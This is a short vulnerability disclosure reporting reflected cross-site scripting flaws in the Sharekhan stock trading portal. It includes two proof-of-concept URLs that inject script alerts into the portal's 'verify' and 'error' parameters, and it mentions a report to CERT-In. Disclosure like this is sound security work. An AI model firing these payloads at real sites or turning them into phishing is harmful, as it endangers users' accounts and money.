Vulnerability Description:
Sharekhan(Indian Stock Trading Portal) provides it’s user to trade in stock market & Manage their DP account also. Being in finance domain it should be secure & vulnerability free but it’s online portal “https://strade.sharekhan.com/” contains multiple XSS ( Cross site scripting) vulnerabilities those can be used against the site users for fishing & information gathering & can be turned to their financial losses . I have tried to contact the sharekhan but didn’t got any positive response yet. So I am reported these vulnerabilities to the cert.in for further action & co-ordination with sharekhan site administrator.
These are fairly simple to discover & exploit.
Type of vulnerability : Input validation ( XSS)
Product: Sharekhan trading Portal
POC :
(User login Required )
https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=<script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512
(User login is not required)
https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&caller=https%253A%252F%252Fstrade.sharekhan.com%252Frmmweb%252Fadminpcs.sk%253F